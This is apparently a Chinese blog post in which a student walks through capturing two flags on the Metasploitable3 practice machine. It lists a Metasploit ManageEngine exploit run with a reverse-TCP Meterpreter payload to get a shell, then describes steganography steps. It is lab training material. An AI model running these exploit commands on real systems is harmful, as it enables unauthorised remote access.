Metasploitable3-flag

Metasploitable3-flag

写这个文章是因老师给了我一个Metasploitable3的靶机,就来搞搞玩玩,然后经过不断地乱撞,最终搞到了15个flag,以下是我寻找15个flag的过程,希望小白的文章能对大家有所帮助。

ace_of_hearts

1.ace_of_hearts
这里刚刚拿到靶场环境,就随便翻了翻电脑里的文件,发现了一张红桃A

然后感觉这应该就是一个flag,打开kali尝试连接该靶机172.21.11.227.
先nmap扫一下,发现了8022端口可以搞一搞

然后打开msf,设置相应的payload,rhost,lhost,target,rport
相关命令:use exploit/windows/http/manageenine_connectionid_write
Set rhosts 172.21.11.227
Set rport 8022
Set lhost 192.168.17.128
Set payload windows/meterpreter/reverse_tcp
设置好相应的参数之后run起来

成功拿到shell
然后进入在靶机发现flag的目录下

下载ace_of_hearts.jpg之后发现还有一个ten_of_diamonds.png也下载下来为下一个flag做打算,
下载ace_of_hearts.jpg之后发现并非flag格式,尝试查看是不是隐写。
利用binwalk发现确实是隐写,里面有一个ace_of_hearts.png文件,接下来利用foremost将图片分离出来,拿到flag。

ten_of_diamonds

在寻找ace的过程中,我们同时下载了ten_of_diamonds.png
但是这个png文件并不能如愿显示flag,由此推断可能是文件里的图片编码被改,这是常见的图片隐写方式。
下面我们用winhex打开刚刚找到的flag:ace_of_hearts.png在这里插入图片描述

再打开ten_of_diamonds.png对比

诶,这就发现了ten_of_diamonds.png的文件头编码不对,并不符合png图片头编码89 50 4E 47。
接下来我们改成一致的编码头,得到了flag
在这里插入图片描述
好了,前两个flag就先到这里了。希望大佬们看了能发表更好的意见指导一下小白。

  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值